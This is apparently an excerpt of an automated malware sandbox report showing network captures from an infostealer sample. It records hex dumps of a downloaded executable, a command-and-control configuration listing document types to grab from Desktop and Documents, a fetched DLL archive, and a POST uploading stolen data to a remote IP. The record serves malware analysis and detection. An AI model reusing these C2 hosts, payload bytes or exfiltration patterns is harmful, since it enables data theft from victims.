00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ooRichPELa0@`@:<P,9800.text `.rdata0@@.data`@@.reloc,P"@B
Nov 30, 2022 00:22:27.387814045 CET	390	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 10 68 28 36 40 00 ff 15 00 30 40 00 89 45 fc 85 c0 0f 84 54 02 00 00 53 56 8b 35 04 30 40 00 57 68 44 36 40 00 50 ff d6 68 54 36 40 00 a3 0c 40 40 00 ff d0 68 6c 36 40 00 89 45 f8 ff 15 0c 40 Data Ascii: Uh(6@0@ETSV50@WhD6@PhT6@@@hl6@E@@h6@E@@h6@@@h6@@@h6@E@@h6@uuh6@V8@@h6@V@@8@@h6@VD@@8@@h7@V$@@8@@h7@V<@@8@@h 7@V@@
Nov 30, 2022 00:22:27.680780888 CET	392	IN	Data Raw: 8b d3 2b 17 d1 fa 52 e8 84 08 00 00 ba 50 30 40 00 59 8d 4d fc 89 45 fc e8 fd 07 00 00 56 ff 15 20 40 40 00 8d 4d fc 8d 14 43 e8 eb 07 00 00 83 3f 00 74 08 ff 37 ff 15 20 30 40 00 8b 45 fc 89 07 33 c0 40 e9 13 05 00 00 6a 6c 5b 6a 33 58 66 39 06 Data Ascii: +RP0@YMEV @@MC?t7 0@E3@jl[j3Xf9ufV @@"uZj0V@@uMjOV@@u@jIV@@u3SV@@u'V7T@@t+R0@WV @@jcYjb[*u[f9uVf9NuPj1Xf9FuGjO^S@@u4jIS
Nov 30, 2022 00:22:27.680824995 CET	393	IN	Data Raw: 53 66 39 1e 75 4e 6a 33 58 66 39 46 02 75 45 6a 30 56 ff 15 18 40 40 00 85 c0 75 38 6a 4f 56 ff 15 18 40 40 00 85 c0 75 2b 6a 49 56 ff 15 18 40 40 00 85 c0 75 1e 6a 6c 58 50 56 ff 15 18 40 40 00 85 c0 75 0f 56 ff 37 ff 15 54 40 40 00 8b d8 85 db Data Ascii: Sf9uNj3Xf9FuEj0V@@u8jOV@@u+jIV@@ujlXPV@@uV7T@@u3_^[SVW4UVj$@@VWS@@P@@S4@@jH@@t @@SjP@@L@@S<@@3_^[V3VH@@t*Wj\@@tW@@tW4@@L
Nov 30, 2022 00:22:27.680851936 CET	394	IN	Data Raw: 75 2a 6a 4f 56 ff 15 18 40 40 00 85 c0 75 1d 6a 49 56 ff 15 18 40 40 00 85 c0 75 10 6a 6c 56 ff 15 18 40 40 00 85 c0 75 03 40 5e c3 33 c0 5e c3 56 8b f1 56 ff 15 20 40 40 00 83 f8 5f 0f 85 84 00 00 00 6a 38 59 66 39 0e 75 7c 0f b7 46 02 6a 30 5a Data Ascii: ujOV@@ujIV@@ujlV@@u@^3^VV @@_j8Yf9u\|Fj0ZAt7Bt2f;t-1t(2t#3t4t5t6t7tf;t9u9RV@@ujOV@@ujIV@@ujlV@@u@^3^VWjD_f9>V @@"FAt
Nov 30, 2022 00:22:27.680877924 CET	396	IN	Data Raw: 00 63 00 67 00 72 00 73 00 7a 00 32 00 64 00 79 00 6d 00 00 00 30 00 78 00 61 00 36 00 33 00 36 00 30 00 65 00 32 00 39 00 34 00 44 00 66 00 43 00 65 00 34 00 66 00 45 00 34 00 45 00 64 00 66 00 36 00 31 00 62 00 31 00 37 00 30 00 63 00 37 00 36 Data Ascii: cgrsz2dym0xa6360e294DfCe4fE4Edf61b170c76770691aA11142UxohbdHGMYGPvW5Uep45Jt9Rj2WvTV958B5G5vHnawZhA4UwoD53Tafn6GRmcGdoS
Nov 30, 2022 00:22:27.973778009 CET	397	IN	Data Raw: 65 00 00 47 6c 6f 62 61 6c 4c 6f 63 6b 00 00 47 6c 6f 62 61 6c 55 6e 6c 6f 63 6b 00 00 00 00 4c 6f 63 61 6c 41 6c 6c 6f 63 00 00 4c 6f 63 61 6c 46 72 65 65 00 00 00 6c 73 74 72 6c 65 6e 57 00 00 00 00 53 74 72 43 68 72 57 00 53 74 72 53 74 72 57 Data Ascii: eGlobalLockGlobalUnlockLocalAllocLocalFreelstrlenWStrChrWStrStrWStrStrIWStrToIntExWPathIsDirectoryWCoInitializeHeapFreeCreateMutexACreateMutexWGetLastErrorSHGetFolderPathAPathAppendWStringCb
Nov 30, 2022 00:22:27.973812103 CET	398	IN	Data Raw: 30 48 30 51 30 56 30 5e 30 63 30 6b 30 70 30 79 30 7e 30 8b 30 91 30 98 30 9e 30 a4 30 a9 30 af 30 b5 30 ba 30 c0 30 c6 30 cb 30 d1 30 d7 30 dc 30 e2 30 e8 30 ed 30 f3 30 f9 30 fe 30 04 31 0a 31 0f 31 15 31 1b 31 23 31 29 31 2f 31 34 31 3a 31 40 Data Ascii: 0H0Q0V0^0c0k0p0y0~000000000000000000000011111#1)1/141:1@1E1K1Q1V1]1b1i1n1t1z111111111111111111111122222 2%2+21262<2B2G2M2S2X2^2d2k2222222222!343Q3a3q3v3333333334444444

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.5	49710	88.198.94.71	80	C:\Users\user\AppData\Local\81bc8e9b-9d47-41ad-b82b-bbc3ff54a6de\build2.exe

Timestamp	kBytes transferred	Direction	Data
Nov 30, 2022 00:22:31.389978886 CET	510	OUT	GET /517 HTTP/1.1 Host: 88.198.94.71
Nov 30, 2022 00:22:31.535934925 CET	510	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 29 Nov 2022 23:22:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 65 39 0d 0a 31 2c 31 2c 31 2c 31 2c 30 2c 38 31 39 32 33 66 38 64 63 32 35 64 66 35 63 62 30 63 37 65 31 36 32 38 34 62 30 64 30 31 64 39 2c 31 2c 31 2c 31 2c 31 2c 30 2c 44 45 53 4b 54 4f 50 3b 25 44 45 53 4b 54 4f 50 25 5c 3b 2a 2e 74 78 74 3a 2a 2e 64 6f 63 3a 2a 2e 64 6f 63 78 3a 2a 2e 72 74 66 3a 2a 2e 78 6c 73 3a 2a 2e 78 6c 73 78 3b 33 30 30 3b 66 61 6c 73 65 3b 6d 6f 76 69 65 73 3a 6d 75 73 69 63 3a 6d 70 33 3b 6c 6e 6b 3b 64 65 63 75 6d 65 6e 74 73 3b 25 44 4f 43 55 4d 45 4e 54 53 25 5c 3b 2a 2e 74 78 74 3a 2a 2e 64 6f 63 3a 2a 2e 64 6f 63 78 3a 2a 2e 72 74 66 3a 2a 2e 78 6c 73 3a 2a 2e 78 6c 73 78 3b 33 30 30 3b 66 61 6c 73 65 3b 6d 6f 76 69 65 73 3a 6d 75 73 69 63 3a 6d 70 33 3a 65 78 65 3b 0d 0a 30 0d 0a 0d 0a Data Ascii: e91,1,1,1,0,81923f8dc25df5cb0c7e16284b0d01d9,1,1,1,1,0,DESKTOP;%DESKTOP%\;.txt:.doc:.docx:.rtf:.xls:.xlsx;300;false;movies:music:mp3;lnk;decuments;%DOCUMENTS%\;.txt:.doc:.docx:.rtf:.xls:.xlsx;300;false;movies:music:mp3:exe;0
Nov 30, 2022 00:22:31.541434050 CET	510	OUT	GET /176356074953.zip HTTP/1.1 Host: 88.198.94.71 Cache-Control: no-cache
Nov 30, 2022 00:22:31.580096960 CET	512	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 29 Nov 2022 23:22:31 GMT Content-Type: application/zip Content-Length: 2685679 Last-Modified: Mon, 12 Sep 2022 13:14:59 GMT Connection: keep-alive ETag: "631f30d3-28faef" Accept-Ranges: bytes Data Raw: 50 4b 03 04 14 00 00 00 08 00 24 56 25 55 2b 6d 5c 08 39 7c 05 00 50 75 0a 00 0b 00 00 00 66 72 65 65 62 6c 33 2e 64 6c 6c ec bd 0f 5c 54 e7 95 37 3e 97 19 61 d0 89 77 28 34 21 29 55 48 68 ab ad 4d e7 3a a6 91 48 13 8c 0c 90 c4 31 18 1c 35 bb 4e 62 ba d6 f5 75 f3 26 46 99 c4 76 33 2d 64 20 ce e3 75 5a 92 d5 d6 6e b5 75 df b2 5d f7 7d e9 bb b4 ab c4 b4 da cc 80 85 11 29 0c 4a 61 50 aa 24 a1 66 28 6c 3b 40 2a ff 52 e6 77 ce 79 ee 9d 19 40 52 b3 bf ee 2f ed ef b3 f9 44 e6 fe 7d 9e f3 9c e7 fc f9 9e f3 fc b9 d6 bf da ab 11 34 1a 8d 4e 33 fd bf 3c cd 1f ff 6f 2f fc 5b b8 f8 27 0b 35 27 92 7f 91 75 4a 58 fb 8b ac 0d 3b fe c7 9e cc 5d bb 9f fd db dd 4f fd cf cc bf 79 ea 99 67 9e 2d cd fc e2 97 32 77 3b 9e c9 fc 1f cf 64 e6 3f 5a 92 f9 3f 9f dd f6 a5 bb b3 35 9a 62 8b 46 b3 56 48 d4 8c ac f8 c8 df a8 e5 f5 6a ee cc 5a 20 2c 84 42 f5 1a cd 8a 04 ba b6 eb 23 70 6c 8c 56 69 a4 63 b8 95 48 54 c7 7e 35 81 f9 d4 88 f3 7f 98 0f b7 f3 56 d3 4b 46 fe 0a ff e5 3f 45 19 f3 35 25 f0 fb 1d f8 f5 e3 c5 aa f9 9a bd da b8 46 15 cc d7 14 7f 0e 7e 8f cd d7 84 ef d2 68 0e de 3a 5f 93 a1 99 fb 3f 7d a6 5e 73 2c ee bc 7a d1 7c 4d 9e 30 f7 f3 77 97 7e 69 6f 29 fc 1e 32 28 ed 5a a8 9f c5 fc 4c 8d 66 eb dd bb b7 3d 55 fa 94 46 73 36 11 1a 0b 75 68 f4 f0 8b bc 98 de 47 79 77 f3 c7 34 b9 05 f0 c7 34 9f 78 a3 b9 63 fe cc e7 bc 77 9b 4c 7f b3 fd 6f 95 aa ca 94 e7 32 66 3d 97 77 f7 ee 3d bb b1 43 88 27 55 9c a7 9a 45 37 7a ee 4b 4f 3f fb 37 1a e2 11 f2 4a 03 7d aa b9 73 d6 73 0f 6a fe fb bf 3f eb ff 6c ec d7 3b 1e 05 79 0d 0d 2f d0 6b 5c 67 75 95 de d2 85 ac 6c 25 5c 71 79 45 57 6f d8 de b0 23 b5 37 12 09 35 f1 db 92 d7 de d0 12 ff 1f bc bf 69 a3 6c d1 c3 7b 8b 64 47 86 ec 4c 93 6d 46 d9 6a a8 8c 94 de 39 2c 1a 93 86 c5 94 32 13 94 36 b0 64 c7 3c 2c e7 6b bc 9c 53 11 f8 6f e0 93 4d 65 2b e0 de 0f e0 bf a6 32 93 72 b4 d3 b8 71 a7 66 a7 e6 b1 f5 c5 a1 07 be 99 08 0f 67 3c f1 a4 bd 21 ae be 92 4d 1b 39 c9 0f 44 49 36 b1 26 85 e8 26 51 ba ee 7a 27 5c fa 77 b2 85 28 b1 1b 64 ab be f2 72 e9 62 20 46 0b c4 ec 23 62 3e c1 1b 35 3c 9f 37 ea fa 40 6e d3 be 28 25 fb 62 94 3c 86 94 14 af df 14 3a 79 88 28 81 aa 8c 91 d7 b0 a2 50 35 7f 77 20 81 4d b1 f0 13 4f fe b5 bd 21 8e 1f 0e 7d e5 f5 d2 4c d9 69 d8 a9 d9 18 7a fd 1f f1 5d 3d 70 64 61 a4 8e de dd c1 df c5 76 f1 f6 b8 fa c6 5c 83 c5 6c 6d f6 32 d9 9a fe 4f 27 4c f3 8d 52 88 e5 67 17 35 e5 67 af 40 23 e1 1a 37 ee be 9d f9 5d bd 49 8e 8f 78 be ac 5f e5 34 3e 9f b6 43 0b 4d e8 ff 31 e8 f1 0e 1d 1e 1d 87 23 d7 8b d9 cb 34 62 c5 61 3c 74 ea e1 e8 eb 70 24 3b d2 2a af 8b 15 2e 38 64 17 d9 98 ab 77 ac 38 d4 9a ac b0 4e ac d8 8b d7 5f cc ce 54 18 94 9f bd 92 d5 bb ea f5 50 7d b6 ec 4c df e4 fb 9d 76 e3 63 a1 27 80 62 79 6d b6 c9 75 d6 30 7a 15 9e 36 49 5e a0 8d 0c 23 fc a6 2b bf 69 ca af 51 f9 35 28 bf 7a e5 97 8c 8f 74 79 60 f1 f6 bb c5 c5 15 24 7f 72 7e f6 12 97 57 28 6b 88 b8 c6 12 d9 90 58 a1 45 72 e0 62 59 83 f0 06 da d1 81 a7 e0 4c b7 3d ee f9 0c 53 7e f6 4a f8 4d 87 df 1c f8 4d 83 df fb e0 d7 08 bf ab e0 d7 00 bf b9 f0 ab 87 df 2f c0 af 0e 7e ef 37 6d c9 7e 00 8e 4d c2 18 d4 e6 6a 82 0a 05 d7 98 20 56 2c 83 3a a0 e5 ba 71 6a 7a de 4e a3 07 5e 2e 86 9f 0d d9 79 8f 15 Data Ascii: PK$V%U+m\9\|Pufreebl3.dll\T7>aw(4!)UHhM:H15Nbu&Fv3-d uZnu]})JaP$f(l;@Rwy@R/D}4N3<o/['5'uJX;]Oyg-2w;d?Z?5bFVHjZ ,B#plVicHT~5VKF?E5%F~h:_?}^s,z\|M0w~io)2(ZLf=UFs6uhGyw44xcwLo2f=w=C'UE7zKO?7J}ssj?l;y/k\gul%\qyEWo#75il{dGLmFj9,26d<,kSoMe+2rqfg<!M9DI6&&Qz'\w(drb F#b>5<7@n(%b<:y(P5w MO!}Liz]=pdav\lm2O'LRg5g@#7]Ix_4>CM1#4ba<tp$;.8dw8N_TP}Lvc'bymu0z6I^#+iQ5(zty`$r~W(kXErbYL=S~JMM/~7m~Mj V,:qjzN^.y
Nov 30, 2022 00:22:31.580159903 CET	513	IN	Data Raw: 47 4a b3 f3 58 6b 68 f4 db d8 83 e9 ac 1e f8 55 f9 30 48 2e bc 01 0f c3 2b ba a9 8a cb 40 75 e5 97 e0 22 56 35 05 0f ac e5 c7 fa 29 af c3 8e e4 c0 ef 76 24 0f 7e 5f 40 72 f1 99 03 bc 29 e9 3a 01 5a 97 8e 8d 4a c3 56 67 a8 4c 8a 63 9a 61 06 53 89 Data Ascii: GJXkhU0H.+@u"V5)v$~_@r):ZJVgLcaSNE"^}m~0f~8WHcuME"K\|$vv2>L6&f`oSER~^/K:%/%&MC6zI?:b ='3pl%MQqL
Nov 30, 2022 00:22:31.580229044 CET	514	IN	Data Raw: 39 8d a5 f7 3d b6 b1 38 94 09 bd 30 f0 59 52 d1 81 fb 5e 47 bd 86 67 d6 87 f6 68 e2 54 17 9f 76 18 4a 00 6e 86 fe 4d a3 a8 68 10 f5 b2 a4 38 b4 45 13 27 43 ff 38 95 04 da ed 3a 9b 4d 32 c4 e5 87 03 ce fb 00 70 ca 8b 00 ec 66 cb 05 3a b9 c8 10 f9 Data Ascii: 9=80YR^GghTvJnMh8E'C8:M2pf:lqPiwGyGK$yMX!FYiP`l6r]b c\8[z>UU}XXl#=x~>;JkWHE4tG&n
Nov 30, 2022 00:22:31.580302954 CET	516	IN	Data Raw: 86 fe 8e 3f 47 2f 6d 0c 3d 4b 67 fa fe f3 c8 d2 33 d3 59 ca 4e 0e c2 f9 c6 50 1b 3d 63 f8 29 de 88 37 f7 79 d0 67 06 60 b1 7e 53 a8 86 3f 22 8c 2e 1d c9 19 79 21 54 42 17 bf 35 3a 8d c5 54 da 74 2e ff 17 f1 97 8d 72 5e fe ea 5d 04 6f e5 67 f5 2a Data Ascii: ?G/m=Kg3YNP=c)7yg`~S?".y!TB5:Tt.r^]og*/1>`Sjcuj,C!KZNxYV]X }a'bXa(Y9%\}2rfCh~7V3-IW4bS$:Xg3?Mtugi4MX?uy([))AF
Nov 30, 2022 00:22:31.580390930 CET	517	IN	Data Raw: 4f be 36 81 5d 81 87 d5 27 bb d1 b0 ac 58 8c 86 65 45 12 99 95 74 7a 05 8c 1b bc 05 c2 a0 d7 c2 8b b6 90 30 ec aa 07 b7 75 41 76 c0 f5 8c 5b 35 dd 50 09 be 9a 4b 36 29 f7 36 34 86 19 cb 35 57 c5 ba 2e 7a 64 c5 ad be 6b c6 e4 46 4e a2 10 70 79 75 Data Ascii: O6]'XeEtz0uAv[5PK6)645W.zdkFNpyuH!0GU'eGfR,W{Ps%##B=kda5sju,}bWdY M"<H[>mb%Tpbdy}D?f}8\|](+m,tP/txYCA
Nov 30, 2022 00:22:31.580461979 CET	519	IN	Data Raw: cc 93 8e 07 8e 13 42 ab 5c 94 cf 3c 2b 54 7d 94 cf 90 10 4e 31 c7 89 54 db 61 e9 22 b3 1f 64 17 65 6a 27 34 a2 92 57 38 a8 b5 1e 04 44 00 1e 25 05 b8 d3 0b 0a e2 38 2c 75 b2 71 b1 7a 48 8f 7a cf 86 95 8a 76 15 b1 93 2b f1 c0 79 02 2c d0 ae b5 ec Data Ascii: B\<+T}N1Ta"dej'4W8D%8,uqzHzv+y,dAb~$EQ$V5#`AsMn\|`]buU[;VO BQ@>~I";IP1(Y.t\<%Zk3g\|yt3d"v~-CblIi
Nov 30, 2022 00:22:31.580532074 CET	520	IN	Data Raw: 9b db d8 43 9b 39 c1 47 f7 72 67 48 7a 0b 5a 6b 09 22 de 0e 4a 6d 52 63 9c bd c2 22 fb 88 d8 be d4 33 08 60 05 e8 dc 00 41 24 10 e9 66 d6 2e 56 a3 8d aa 11 6b c0 62 51 d1 68 4d bb d0 9a da 82 29 20 71 41 29 30 dd 9a 32 9b 5b b6 9e 50 f9 ea e7 7c Data Ascii: C9GrgHzZk"JmRc"3`A$f.VkbQhM) qA)02[P\|r\|iNxVEFHSFrSOP~yL):)=,L("0rkz}JG4(Tj*4qa9H020!:l;'Q%pR&ShbTZcL
Nov 30, 2022 00:22:31.580602884 CET	521	IN	Data Raw: 85 bb 15 cc 18 74 f0 e2 50 53 a5 4e 85 5e db 71 22 96 aa 50 0b 46 1b 7c 5a 9a e4 06 fb 12 ef ff 83 9c e6 23 84 04 d6 46 14 24 40 81 a0 b5 96 60 eb e6 28 6c b5 bb a5 06 c5 0f b4 a2 81 0d d2 08 8f 17 f3 b3 5e 36 44 bd 0f 0a 1e e6 b0 75 94 87 58 04 Data Ascii: tPSN^q"PF\|Z#F$@`(l^6DuX\lTJ.:1AXjA9rYuyfV ^),AU;X+-0l#ijA@\)R<S"8ZuCe9kdyv2{JUd.vH<gWX4Vi\|.48MpPMF
Nov 30, 2022 00:22:31.580672026 CET	523	IN	Data Raw: 9b 78 da 8d b0 88 f3 2c 4a 3d 95 ea 43 e3 7a 1e f4 ae 9b 47 86 a8 87 3c 97 cd 21 ee 29 35 2d 14 e6 69 21 ad a5 6c 9a 71 ad 42 e3 5a 45 7a 15 b5 ac 4a c0 09 71 83 34 4a 63 2e 93 6c 88 14 2a c8 f3 58 dc b6 6e 50 6d eb b6 68 1e ab 11 4c 86 23 8c 7d Data Ascii: x,J=CzG<!)5-i!lqBZEzJq4Jc.lXnPmhL#}Us4MqH5NLAIAy' \8-s:[E\W^{}Jp7W]JN+1bC6eUEHHt,^[07+u~s*M)!{<+D
Nov 30, 2022 00:22:31.580769062 CET	524	IN	Data Raw: 0e a0 f1 55 93 1a d1 e1 cd 90 30 15 17 c3 cb d6 32 69 48 b6 1f 80 00 c6 cf c5 f8 bc 9e 75 6a 4f 92 f7 39 b4 4c 9d 1a c6 a5 98 26 6d 41 64 d8 2c 8d aa fe ed 08 f7 6f dc f5 87 84 09 c5 fa b6 f2 74 e1 45 94 df 4b 1c d9 60 34 73 80 22 f9 3c 55 c0 72 Data Ascii: U02iHujO9L&mAd,otEK`4s"<Urc'hV>MO&ygS#N!=4j0-m>[]:TNiCHg'sO,p[%lU5u<MHqxV_A6iCQYH{qWfD-^'E
Nov 30, 2022 00:22:31.619200945 CET	525	IN	Data Raw: c6 14 e5 d5 4a 53 f1 59 84 21 8c 78 47 a5 7a cc 20 e0 ec b5 a0 1e bb e9 bc 3e 06 2e f8 e0 89 a3 2f a5 95 4f 30 ec 44 11 1d a5 04 af 3a af 80 e3 59 c7 b1 68 28 ad cc 2b 60 ed c0 f9 ab 00 34 9a 69 c2 b1 b2 18 a4 8d 83 da 69 e9 2f 61 32 a5 3d 3e 99 Data Ascii: JSY!xGz >./O0D:Yh(+`4ii/a2=>`.MBw$g\U%xEcf@18suB,7jcY7zXZ0oD;AKFLS5%kMZU\YQXM+P@I0_!/[_j+u/5{S #u1
Nov 30, 2022 00:22:37.663202047 CET	3349	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----1417805488924803 Host: 88.198.94.71 Content-Length: 131097 Connection: Keep-Alive Cache-Control: no-cache
Nov 30, 2022 00:22:37.663290977 CET	3361	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 31 34 31 37 38 30 35 34 38 38 39 32 34 38 30 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 72 6f 66 69 6c 65 22 0d 0a 0d 0a 35 31 37 0d 0a 2d 2d 2d Data Ascii: ------1417805488924803Content-Disposition: form-data; name="profile"517------1417805488924803Content-Disposition: form-data; name="profile_id"0------1417805488924803Content-Disposition: form-data; name="hwid"060685bb5ab83
Nov 30, 2022 00:22:37.703824997 CET	3380	OUT	Data Raw: 57 6f 70 48 78 46 38 78 64 35 37 49 56 6c 65 4c 75 55 73 6e 37 39 38 47 43 42 44 72 64 4b 55 6f 38 6d 46 64 6b 76 61 53 6b 52 30 2b 4d 6f 70 35 76 32 56 6d 2f 45 77 30 62 4a 38 72 51 68 7a 38 50 48 2b 6a 5a 37 54 52 34 62 53 45 39 35 76 65 4f 75 Data Ascii: WopHxF8xd57IVleLuUsn798GCBDrdKUo8mFdkvaSkR0+Mop5v2Vm/Ew0bJ8rQhz8PH+jZ7TR4bSE95veOuajryqC51D52IYmXwzVTIiZjmCQCsMnBrvhoX7/IwYsI1fGYV53vnchgG+YAC5LxSGjuqBJoFpy8PTXZ/Zaj8e/n1v1FqVTd1f8c3Hi6U365tMrYgSZRJb9K5HQ/jipsKXgZ2nU79nYRfm+wsnsKbWxuPih29yz4+Z
Nov 30, 2022 00:22:37.704188108 CET	3385	OUT	Data Raw: 35 39 45 33 4a 59 71 2b 48 50 6d 2f 72 6b 34 39 6b 61 44 30 63 33 48 38 47 52 4f 6d 48 66 49 4f 46 37 76 72 72 31 39 57 61 63 66 6a 6d 69 65 7a 44 69 75 4f 4c 43 65 49 70 31 55 71 58 62 33 67 2b 75 48 34 30 32 31 42 66 46 39 44 36 7a 4e 44 66 6c Data Ascii: 59E3JYq+HPm/rk49kaD0c3H8GROmHfIOF7vrr19WacfjmiezDiuOLCeIp1UqXb3g+uH4021BfF9D6zNDflU47dkEksnbJuzhMH/CIb+GMD9DSQHNPV3M1pqqvnjhtxK7Zmtqn5Or/qWEnJX8va+Gjt+2QPuHSUfd8PNN4YerpUDeffNjbCIbn1pKC3tF7HFLrpYl18Ka/cLSGg2eiNxrLXmKGVXmkUEI0m/H+vVjjIeS4U4IiRd
Nov 30, 2022 00:22:37.744473934 CET	3424	OUT	Data Raw: 48 67 72 45 38 51 34 5a 6c 67 2f 71 76 31 74 68 47 4f 72 79 7a 55 6c 65 42 2b 49 2f 66 4c 6b 7a 39 4e 37 67 44 2b 33 76 79 48 68 53 30 70 41 4b 42 36 71 54 58 62 79 75 6f 61 36 53 43 36 6b 6c 78 72 47 69 50 42 48 31 6c 4a 68 4c 67 63 64 41 31 56 Data Ascii: HgrE8Q4Zlg/qv1thGOryzUleB+I/fLkz9N7gD+3vyHhS0pAKB6qTXbyuoa6SC6klxrGiPBH1lJhLgcdA1VFnSYoFDoGIqV7qq6obyi/DFcRITk2J1LgotCp3xOq3VetUwWXgJoXMyAcLVgT+9eqpHaXp0nJy8vc6we7ybQJmXEs5ptydmXe9dsA2haL2brTt4dxIkMdZY1VDOwivxLq2BFqIpwlLvVLocrSMd08tukoQr6lyFQs
Nov 30, 2022 00:22:37.748291969 CET	3429	OUT	Data Raw: 57 61 65 33 59 75 73 4b 53 4f 52 66 52 6f 76 4f 56 68 6b 30 71 79 76 66 6c 5a 6e 6c 6c 38 41 67 52 6b 34 6e 46 58 2b 38 66 4a 35 43 73 4d 4e 7a 67 2f 78 66 35 67 59 65 34 2f 35 47 54 47 6e 37 6d 34 34 2f 66 54 70 66 53 56 79 5a 62 57 51 6a 61 32 Data Ascii: Wae3YusKSORfRovOVhk0qyvflZnll8AgRk4nFX+8fJ5CsMNzg/xf5gYe4/5GTGn7m44/fTpfSVyZbWQja2chDnOyjTLKiKswhPCB7cJDC0WF/x680tDW73i09OwOMHGheOzL4HYHzs4ta8vs576nFc/2tz7dGe4fb5zG2lU9f3b0MXbkk7Stjf58kXYfzWMJt2qYK0UmouSvQLO2zOE6IwS8NH2CTLZTF8ffnThlZo2lYLEttwe
Nov 30, 2022 00:22:37.784800053 CET	3459	OUT	Data Raw: 33 45 4d 4d 33 58 46 63 2f 78 66 4e 72 30 33 75 63 56 66 75 63 64 6b 47 67 34 46 30 66 4e 4d 76 77 36 31 67 66 73 46 6e 4f 66 2b 58 31 56 4b 74 6f 48 34 45 71 72 49 66 31 53 42 68 6d 39 6b 41 68 34 35 4e 62 56 48 2f 59 62 36 71 61 75 6a 56 73 56 Data Ascii: 3EMM3XFc/xfNr03ucVfucdkGg4F0fNMvw61gfsFnOf+X1VKtoH4EqrIf1SBhm9kAh45NbVH/Yb6qaujVsV4X9hJkgiqERFCAKAZ6C1tAsy3AdoIxA+Y/8KQn+cq9G92cJ8o1k9rQuueDj7t54H1W1WjTqfOqlCkZqbF3sKnKYX40FzhBOnE4Jkk7Odem6CnitRgchtF44Hgy0K94BF7lZFnlm8QM7rr9ssnmiq8izLNtiKQp3pa
Nov 30, 2022 00:22:37.785099030 CET	3467	OUT	Data Raw: 38 39 64 4d 47 71 43 55 36 43 69 6b 44 48 51 33 61 4b 37 79 74 53 69 4e 4a 4b 33 30 6c 36 74 44 70 52 41 4e 49 52 2f 72 66 42 54 61 61 4c 74 46 71 73 2f 4d 73 43 6d 2f 2f 67 38 2b 6a 78 73 41 6e 70 45 77 2b 79 47 62 50 2b 78 6e 2b 6d 52 74 35 34 Data Ascii: 89dMGqCU6CikDHQ3aK7ytSiNJK30l6tDpRANIR/rfBTaaLtFqs/MsCm//g8+jxsAnpEw+yGbP+xn+mRt54oInIwej4mXlIUYCbTsVLHVLxyqn7UOOHUTdZSU9VE2dvDW/vIdey8Oz11JKIM4f6T6h0qYa51yutwz35z4OtEwvILJZnWXUH6W/ulHIhXuSmNeXMXb/AL0MUeVcj0t6UOMO/g052STVZLpxKKF4SzbTKez611bj8i
Nov 30, 2022 00:22:37.785099030 CET	3476	OUT	Data Raw: 4a 6d 33 6c 45 4d 51 38 4f 49 54 6a 77 64 52 2f 4e 61 54 66 54 73 71 62 79 68 35 4a 72 78 32 7a 2b 6d 6b 76 42 54 52 58 39 42 66 42 6b 70 4c 52 46 52 51 4d 36 62 32 69 59 2b 66 66 49 73 53 67 41 67 7a 51 35 35 45 75 33 54 39 54 47 53 6a 6e 36 57 Data Ascii: Jm3lEMQ8OITjwdR/NaTfTsqbyh5Jrx2z+mkvBTRX9BfBkpLRFRQM6b2iY+ffIsSgAgzQ55Eu3T9TGSjn6WnH3miILjiW8iWsR06saJBHyFsNnN/Y8nk+y08lk/b1ZOBsEBqoWUOIU7RbMtlFGPnnsXpaqPF6vwhojPAZGrf7/GS9yhsUMj1sJdT+53FpI9DBaOodvdN2Td/d4ezWPOnlGCmiYdvKua5c4ZDGlNHy39NVuUTxEiO
Nov 30, 2022 00:22:37.785850048 CET	3478	OUT	Data Raw: 70 65 44 67 70 4e 2b 63 76 49 31 2b 48 2b 61 4e 58 44 6f 57 35 33 67 6f 4b 57 32 42 2b 6e 58 50 4c 78 64 2f 50 49 41 48 6a 6c 52 4f 37 70 4c 74 61 38 65 54 58 41 78 63 58 50 30 46 73 63 72 75 33 6b 58 2f 63 75 73 56 32 5a 4f 4f 6e 38 73 36 39 79 Data Ascii: peDgpN+cvI1+H+aNXDoW53goKW2B+nXPLxd/PIAHjlRO7pLta8eTXAxcXP0Fscru3kX/cusV2ZOOn8s69y/7vO+FOk1Vlr53O/Uaka3Z0Jq5ATV4zTOhB9nF3seoEWZQP/nkg/f7BlvlzNd31ha4FR7rGHvBdZMbTkl1iArBePMWBc0id2ZxJ33tfmwz+j5BulcZvGIxedY3yjMiddy+LbnszXzj8EVe9B5/GU8nN0F3157+8wy
Nov 30, 2022 00:22:38.596460104 CET	3479	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 29 Nov 2022 23:22:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49702	162.0.217.254	443	C:\Users\user\Desktop\U59WtZz2Sg.exe

Timestamp	Direction	Data
2022-11-29 23:22:09 UTC	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
